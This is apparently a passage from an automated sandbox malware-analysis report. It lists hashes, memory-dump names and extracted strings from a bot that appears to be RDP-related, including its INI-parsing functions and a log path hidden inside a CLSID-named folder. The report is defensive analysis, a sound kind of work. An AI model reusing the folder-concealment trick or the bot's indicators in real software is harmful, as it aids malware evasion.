                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$kernel32
                                                                                                                  • API String ID: 513531256-1037688549
                                                                                                                  • Opcode ID: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
                                                                                                                  • Instruction ID: 40e32f94a878323150a508fca6637224d70ebf18701c300c918ee53080865090
                                                                                                                  • Opcode Fuzzy Hash: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
                                                                                                                  • Instruction Fuzzy Hash: 63418121A0CA82C6F7309F12E854BFA63A9FB847A4F402175DA4D87BB5DF2CE5818700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$strtol
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                                                                  • API String ID: 3596500743-1991603811
                                                                                                                  • Opcode ID: dbba0098bebe7831bce11c10c15f7774c0d09e815bf04c0a2830f14020b63573
                                                                                                                  • Instruction ID: b9c45963e3c913e3f16c8e9a5c618c6cee8441d183ac5fb8a78debfd00261dbf
                                                                                                                  • Opcode Fuzzy Hash: dbba0098bebe7831bce11c10c15f7774c0d09e815bf04c0a2830f14020b63573
                                                                                                                  • Instruction Fuzzy Hash: 52219E22B0CE4682E7519B92A9407BA2361BF86BA8F4440B3EE4C07675DF3CE845C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                  • API String ID: 3513630032-2210897324
                                                                                                                  • Opcode ID: c2430e51137bdfcac8a7f993bd81b79aa4d505aa55653bf079d0e14eac936d9b
                                                                                                                  • Instruction ID: d9702e1349206ccdf52ec6ada4ceba532e3b388916dabd49c788175f57c1d9b1
                                                                                                                  • Opcode Fuzzy Hash: c2430e51137bdfcac8a7f993bd81b79aa4d505aa55653bf079d0e14eac936d9b
                                                                                                                  • Instruction Fuzzy Hash: FF21BD21A08E42D5EB319F16E841BEA27A8BB447A8F441076EE8C476B0DF3DD885C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                  • API String ID: 3513630032-2210897324
                                                                                                                  • Opcode ID: 89aa0e21db250a0a9dc53d02ceb4111de0ca1078fcb1226ea4dddc7f73a03173
                                                                                                                  • Instruction ID: a2c78f7096fee2778d08a22b1b7714098b19633d47c18b4bf433ad4521e5341f
                                                                                                                  • Opcode Fuzzy Hash: 89aa0e21db250a0a9dc53d02ceb4111de0ca1078fcb1226ea4dddc7f73a03173
                                                                                                                  • Instruction Fuzzy Hash: B0216B62708E8396E6119F2AE9407FE2764EB46BA4F4440B3EE4C47674CF3CD945C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                  • API String ID: 3513630032-2210897324
                                                                                                                  • Opcode ID: 94d0e78b07dbf61140f28006557bc8682f70656e71a87a5cbcffd379b83ea19f
                                                                                                                  • Instruction ID: a9adae21544609bdd8c8d518acb7cc25291df43e8f34a781e56cb9caedf7ddca
                                                                                                                  • Opcode Fuzzy Hash: 94d0e78b07dbf61140f28006557bc8682f70656e71a87a5cbcffd379b83ea19f
                                                                                                                  • Instruction Fuzzy Hash: 89219C21A08E8295EB10DF16EC407EA2365BB447A8F4441B2EE4D077F8DFBCE945D704
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                  • API String ID: 3513630032-2210897324
                                                                                                                  • Opcode ID: 3c86b423fce599834930ca3206a9adab9fd587731cb857f35fac76dd912f844b
                                                                                                                  • Instruction ID: 8ead8a584d7bd00f1bd736b4518a475c1983c71f1a79d50192d8b22238169598
                                                                                                                  • Opcode Fuzzy Hash: 3c86b423fce599834930ca3206a9adab9fd587731cb857f35fac76dd912f844b
                                                                                                                  • Instruction Fuzzy Hash: A4218D22B0CE42C6E6528F96F8407BA2361BB86BA4F5440B7EE4D07664DF3DE845C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                  • API String ID: 3513630032-2210897324
                                                                                                                  • Opcode ID: 3a7ce3b9ecf46ad6e41ffd90ef29d7b1f69444f0e76e5fee42ec8905986ab387
                                                                                                                  • Instruction ID: dec95aa38b2c74718abe27772fc588c8015df959b5d5ff0a66257b9335d796e3
                                                                                                                  • Opcode Fuzzy Hash: 3a7ce3b9ecf46ad6e41ffd90ef29d7b1f69444f0e76e5fee42ec8905986ab387
                                                                                                                  • Instruction Fuzzy Hash: A621DE22A18E4785E7619F96F8407AA336AFB447A8F484076EE4C47770CF7CD986C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                  • API String ID: 3513630032-2210897324
                                                                                                                  • Opcode ID: 9926e12a93399cbd0f51199e7bb221f18335d9af71f7cbefae87d4a12f157c56
                                                                                                                  • Instruction ID: c70ca9367eeb85c6f09891d1d29e4eebca2705f67a715df781787005d2469805
                                                                                                                  • Opcode Fuzzy Hash: 9926e12a93399cbd0f51199e7bb221f18335d9af71f7cbefae87d4a12f157c56
                                                                                                                  • Instruction Fuzzy Hash: E0217E22A08E8386E7119F96EC407EB6768BB847A8F845072EE4D47670EF3CE845C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                  • API String ID: 1004003707-3780280517
                                                                                                                  • Opcode ID: bfa3c9006445efba63ba8326c9e85cb3af0e39facda1b26ce66b92f8449dc0da
                                                                                                                  • Instruction ID: 1dfe41b592edacf9bdaaac4e61243ead77e0a76fbc697503833281367f93d74a
                                                                                                                  • Opcode Fuzzy Hash: bfa3c9006445efba63ba8326c9e85cb3af0e39facda1b26ce66b92f8449dc0da
                                                                                                                  • Instruction Fuzzy Hash: 74412AA1A0DE47D1FF388F56A840BF96368AF00378F4461B6EA9D065B4DF7CA945C340
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                  • API String ID: 1004003707-3780280517
                                                                                                                  • Opcode ID: aafbfb6d1cad4e1dac59c53ae980061822dba5a3be8acbd62d8547b9bc58a3d9
                                                                                                                  • Instruction ID: ac229b04b9db741d938e4d60755e9cc6501d3d8404e2a62530a4b97c8e8e64e1
                                                                                                                  • Opcode Fuzzy Hash: aafbfb6d1cad4e1dac59c53ae980061822dba5a3be8acbd62d8547b9bc58a3d9
                                                                                                                  • Instruction Fuzzy Hash: F0414861A08E87D5FB50CB53EC107F52261BB24368F4441B2DA5D065F9DFFCAA49D308
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                  • API String ID: 1004003707-3780280517
                                                                                                                  • Opcode ID: e858cae3dc97d11c6470ca111c3d7212b8439e8bace66bc7af2e7ae73a402f84
                                                                                                                  • Instruction ID: 26f1674117f3628952fe2bc022a41f3f498e6bf3ad5a1372327fcefe48d6297b
                                                                                                                  • Opcode Fuzzy Hash: e858cae3dc97d11c6470ca111c3d7212b8439e8bace66bc7af2e7ae73a402f84
                                                                                                                  • Instruction Fuzzy Hash: 8F410C62F0CE47D5FA21CB92A9503F82261BFA6B68F5841F3E94C461B1DF3CA545C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                  • API String ID: 1004003707-3780280517
                                                                                                                  • Opcode ID: 294f8e8ff5cc726cee35a654d782d5a40a71da78ca2345d8e6786d0abf33f29c
                                                                                                                  • Instruction ID: 0dba368a63209de25907f1ee489db7c10b3260e148d46bb2c1ff5bc3426d20ee
                                                                                                                  • Opcode Fuzzy Hash: 294f8e8ff5cc726cee35a654d782d5a40a71da78ca2345d8e6786d0abf33f29c
                                                                                                                  • Instruction Fuzzy Hash: C9417F62A18E4795FB118B92E8403F86759BF0136CF8841BADA4D461B4DF7CEA56C300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                  • API String ID: 1004003707-386092548
                                                                                                                  • Opcode ID: cdad1e16d434cd18abeb0963fc75aef5f7df0e511999ceea25923137117deeeb
                                                                                                                  • Instruction ID: 2c725ca7a9d11cbd4244262dc490139ededfab8f73a3f1e06081bda7a2781499
                                                                                                                  • Opcode Fuzzy Hash: cdad1e16d434cd18abeb0963fc75aef5f7df0e511999ceea25923137117deeeb
                                                                                                                  • Instruction Fuzzy Hash: 924114A1A0DA87D1FF349F52E841BF82368AB04378F4461B6DA9D1A5B5DF3CEA45D300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                  • API String ID: 1004003707-386092548
                                                                                                                  • Opcode ID: 34b49037a4cb7f7fc6fbca85d598d0711919c259c27d9113e61f5b93c9623b77
                                                                                                                  • Instruction ID: 45646572395697d03f347989701972c70b844214f9107c310afbe5fe076d559c
                                                                                                                  • Opcode Fuzzy Hash: 34b49037a4cb7f7fc6fbca85d598d0711919c259c27d9113e61f5b93c9623b77
                                                                                                                  • Instruction Fuzzy Hash: 1C4126A1A0CE87D5FF50DB42AC517F52250BB107A8F4440B6DA5C0A9F9EFFCAA4AD304
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                  • API String ID: 1004003707-386092548
                                                                                                                  • Opcode ID: cbae729921808903d89f924af3bb35677f728475178ab91845b5bdec3c6d4aa5
                                                                                                                  • Instruction ID: 2cfafb641b4de977177268e639f34e67bcf37b9737a8eaf5da67d2bca2ad2fed
                                                                                                                  • Opcode Fuzzy Hash: cbae729921808903d89f924af3bb35677f728475178ab91845b5bdec3c6d4aa5
                                                                                                                  • Instruction Fuzzy Hash: FF410B61F0CE47D1FA12CB92E9503B52261AF92B68F4440F3EA0D065B1DF3CE946D340
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
